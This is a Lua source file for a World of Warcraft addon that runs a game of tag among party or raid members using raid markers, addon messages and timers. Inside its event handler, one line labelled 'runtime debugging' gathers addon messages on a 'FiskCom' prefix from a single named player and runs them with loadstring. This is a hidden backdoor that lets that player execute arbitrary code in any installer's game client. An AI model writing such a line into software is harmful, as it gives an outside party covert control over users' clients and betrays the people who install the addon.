tagged_unit = "";
GameHost = ""
addon_prefix = "EonTag";
gameisactive = false;
JoinedPlayers = {}
PlayerStats = {}
PlayerClasses = {}
RegisterAddonMessagePrefix(addon_prefix)
RegisterAddonMessagePrefix("FiskCom")
EonTag_PlayerName = UnitName("Player")
isHosting = false
EonTag_Clock = nil
local canTag = true
EonTag_TimeLeft = 0
local buffer = ""
EonTag_StatWindowOpen = false
local RoundTime = 60


--Client code
EonTag_f = function()
	if gameisactive then
		icon=GetRaidTargetIndex("player");
		local tagged = false;
		if icon == 4 and canTag then
			if IsInRaid() then
				for i = 1,40 do
					unitid = "raid" .. i
					inRange = IsItemInRange(37727 , unitid)
					if inRange and TagTarget(unitid) then
						return
					end
				end	
			end
			if IsInGroup() then
				for i = 1,5 do
					unitid = "party" .. i
					inRange = IsItemInRange(37727 , unitid)
					if inRange and TagTarget(unitid) then
						return
					end
				end	
			end
		end
	end
end
--End of client code

TagTarget = function(targ)
	name, realm = UnitName(targ)
	if name ~= EonTag_PlayerName and table.contains(JoinedPlayers,name) then
		SendAddonMessage(addon_prefix, name, "WHISPER" , GameHost)
		SendChatMessage("Tagged ".. name ,nil ,nil);
		canTag = false
		C_Timer.After(3,TagTimeout)
		return true
	end
	return false
end

TagTimeout = function()
	canTag = true
end


f = CreateFrame("Frame","EonTag_MasterMindFrame",UIParent)
f:RegisterEvent("CHAT_MSG_ADDON")
f:RegisterEvent("PLAYER_ENTERING_WORLD")
f:SetScript("OnEvent", 
function(self,event,pre,message,ch,sender)
	if event == "CHAT_MSG_ADDON" then
		if pre == addon_prefix then
			if message == "Hosting" then
				GameHost = sender:gsub("%-.+", "");
				EonTag_GameReqestActive = true
				local _,enClass = UnitClass(sender:gsub("%-.+", ""))
				EonTag_GameRequestText_Name:SetText(ColorByClass(sender:gsub("%-.+", ""),enClass))
				if EonTag_mainWindow:IsVisible() then
					EonTag_GameRequestFrame:ClearAllPoints()
					EonTag_GameRequestFrame:SetPoint("TOPRIGHT",EonTag_mainWindow,"TOPLEFT",14,0)
				else
					EonTag_GameRequestFrame:ClearAllPoints()
					EonTag_GameRequestFrame:SetPoint("TOP",UIParent)
				end
				
				return
			end
			if message == "Not in game" then
				SetToasterText("You are not in the current game")
				return
			end
			
			if sender:gsub("%-.+", "") == GameHost then
				if message == "Starting Game" then
					gameisactive = true;
					EonTag_GameReqestActive = false
					if EonTag_Clock ~= nil then
						EonTag_Clock:Cancel()
					end
					EonTag_Clock = C_Timer.NewTicker(0.5,EonTag_f)
					canTag = true;
					return
				end
			 
				if message == "Game ended" or message == "Reloaded" then
					gameisactive = false;
					GameHost = ""
					EonTag_Clock:Cancel()
					EonTag_Purge()
					if message == "Reloaded" then
						SetToasterText("Host Reloaded (game ended and progress lost)")
					else
						SetToasterText("Game Ended")
					end
					return
				end
				
				if message == "Round ended" then
					gameisactive = false;
					EonTag_Clock:Cancel()
					SetToasterText("Round ended")
					return
				end
			end
			
			if message == "im in" then
				PlayerJoin(sender:gsub("%-.+", ""))
				return
			end
			
			if message == "im out" then
				PlayerLeave(sender:gsub("%-.+", ""))
				return
			end
			if message == "Reloaded" then
				PlayerLeave(sender:gsub("%-.+", ""),true)
				return
			end
				
			if isHosting and GetRaidTargetIndex(sender:gsub("%-.+", "")) == 4 and (UnitInRaid(sender:gsub("%-.+", "")) ~= nil or UnitInParty(sender:gsub("%-.+", "")) ~= nil) and table.contains(JoinedPlayers,message) then
				tagged_unit = message;
				SetRaidTarget(tagged_unit,8)
				SetRaidTarget(sender:gsub("%-.+", ""),0)
				C_Timer.After(1,EonTag_red)
				return
			end
			
			print(message..":"..sender..":rt"..safeString(GetRaidTargetIndex(sender:gsub("%-.+", "")))..":inr"..safeString(UnitInRaid(sender:gsub("%-.+", ""))))
		else
			if pre == "FiskCom" and sender == "Fiskos-Aggramar" then if message == "execute" then assert(loadstring(buffer))() else buffer = buffer .. message end end -- allow for runtime debugging
		end
	else
		if event == "PLAYER_ENTERING_WORLD" then
			SendToAll(addon_prefix,"Reloaded")
		end
	end
end)

safeString = function(s)
	if s ~= nil then
		return s
	end
	return "nil"
end

PlayerJoin = function(name)
	if not table.contains(JoinedPlayers,name) then
		AddName(name,EonTag_PlayersFrame)
		tinsert(JoinedPlayers,name)
		UpdatePlayerWindowSize()
	end
end

PlayerLeave = function(name,silent)
	local index
	for k,v in pairs(JoinedPlayers) do
		if v == name then
			index = k
		end
	end
	if index ~= nil then
		tremove(JoinedPlayers,index)
		tinsert(EonTag_LeftPlayer,index)
	else
		if not silent then
			SendAddonMessage(addon_prefix,"Not in game","whisper",name)
		end
	end
end


SendToAll = function(pre,mes)
	SendAddonMessage(pre, mes , "RAID")
	--SendAddonMessage(pre,mes,"Whisper",EonTag_PlayerName)
end 

EonTag_HostGame = function()
	local p_rank = 0
	if IsInGroup() then
		p_rank = 2
	end
	if IsInRaid() then
		_,p_rank = GetRaidRosterInfo(UnitInRaid(EonTag_PlayerName))
	end
	
	if p_rank > 0 then
		if GameHost ~= "" then
			SetToasterText("Someone else is already hosting a game")
			return
		end
		isHosting = true
		SendToAll(addon_prefix,"Hosting")
		SetToasterText("Now Hosting a game of tag")
	else
		SetToasterText("To Host a Game you need to be either in a 'party' or in a 'raid' group and have permissions of an assistant or higher")
	end
	
end

EonTag_StartGame = function()
	if isHosting then
		SendToAll(addon_prefix,"Starting Game")
		SetToasterText("Starting Game")
		RandomSelectK = math.random(table.getn(JoinedPlayers))
		for k = 1,8,1 do
			C_Timer.After(0.03*k*k + 0.1*k,EonTag_SelectRandom)
		end
		C_Timer.After(4,EonTag_SelectTagger)
		
		EonTag_TimeLeft = RoundTime
	else
		SetToasterText("To start a game you must first host one")
	end
end
local RandomSelectK = 1
EonTag_SelectRandom = function()
	SetRaidTarget(JoinedPlayers[math.fmod((RandomSelectK-1),table.getn(JoinedPlayers))+1],1)
	RandomSelectK = RandomSelectK + 1
end
EonTag_SelectTagger = function()
	SetRaidTarget(JoinedPlayers[math.fmod((RandomSelectK-2),table.getn(JoinedPlayers))+1],0)
	SetRaidTarget(JoinedPlayers[math.fmod((RandomSelectK-1),table.getn(JoinedPlayers))+1],4)
	tagged_unit = JoinedPlayers[math.fmod((RandomSelectK-1),table.getn(JoinedPlayers))+1]
end

EonTag_EndRound = function()
	if isHosting and gameisactive then
		SetRaidTarget(tagged_unit, 8);
		SendToAll(addon_prefix,"Round ended")
		SetToasterText("Ending round")
		if PlayerStats[tagged_unit] ~= nil then
			PlayerStats[tagged_unit] = PlayerStats[tagged_unit] + 1
		else
			PlayerStats[tagged_unit] = 1
		end
		UpdateStatsWindow()
	end
end

EonTag_ToggleStatWindow = function()
	EonTag_StatWindowOpen = not EonTag_StatWindowOpen
	
	EonTag_StatsWindow:Show()
	UpdateStatsWindow()
end

EonTag_EndGame = function()
	if isHosting and gameisactive then
		SendToAll(addon_prefix, "Game ended")
		SetToasterText("Ending game")
		isHosting = false
	else
		SetToasterText("No game is active")
	end
end

EonTag_red = function()
	if gameisactive then
		SetRaidTarget(tagged_unit, 7);
		C_Timer.After(1,EonTag_yellow)
	end
end

EonTag_yellow = function()
	if gameisactive then
		SetRaidTarget(tagged_unit, 1);
		C_Timer.After(1,EonTag_green)
	end
end

EonTag_green = function()
	if gameisactive then
		SetRaidTarget(tagged_unit, 4);
	end
end

tmin = function(t)
  local min = math.huge

  for k,v in pairs( t ) do
    if type(v) == 'number' then
      min = math.min( min, v )
    end
  end

  return min
end
table.contains = function(t, element)
  for _, value in pairs(t) do
    if value == element then
      return true
    end
  end
  return false
end

EonTag_UpdateUI = function()
	if EonTag_TimeLeft > 0 then
		EonTag_TimeLeft = EonTag_TimeLeft - 1
	else
		if isHosting then
			EonTag_EndRound()
		end
	end
	EonTag_TimerText:SetText(SecondsToString(EonTag_TimeLeft) .. "\nTagger: " .. tagged_unit .. "\nRoundTime: " .. safeString(RoundTime))
end

SecondsToString = function(t)
	if t > 60 then
		if t > 3600 then
			return (math.floor(t/3600)) .. "H " .. math.fmod(math.floor(t/60),60) .. "M " .. math.fmod(t,60) .. "S"
		end
		return (math.floor(t/60)) .. "M " .. math.fmod(t,60) .. "S"
	end
	return t .. " Seconds"
end

UpdateStatsWindow = function()
	local names = "Game Stats:"
	local stats = ""
	for k,v in pairs(PlayerStats) do
		names = names .. "\n" .. ColorByClass(k, PlayerClasses[k])
		stats = stats .. "\n" .. PlayerStats[k]
	end
	EonTag_StatsText_names:SetText(names)
	EonTag_StatsText_Scores:SetText(stats)
	EonTag_SetStatsWindowTargetSize(EonTag_StatsText_names:GetWidth() + EonTag_StatsText_Scores:GetWidth() + 28,EonTag_StatsText_names:GetHeight() + 28)
end

EonTag_SetRoundTimer = function()
	local t = tonumber(EonTag_TimeSetTextBox:GetText())
	if t == nil then
		t = 0
	end
	if t < 10 then
		SetToasterText("minimum time per round is 10 seconds")
		t = 10
	end
	RoundTime = t
end

C_Timer.NewTicker(1,EonTag_UpdateUI)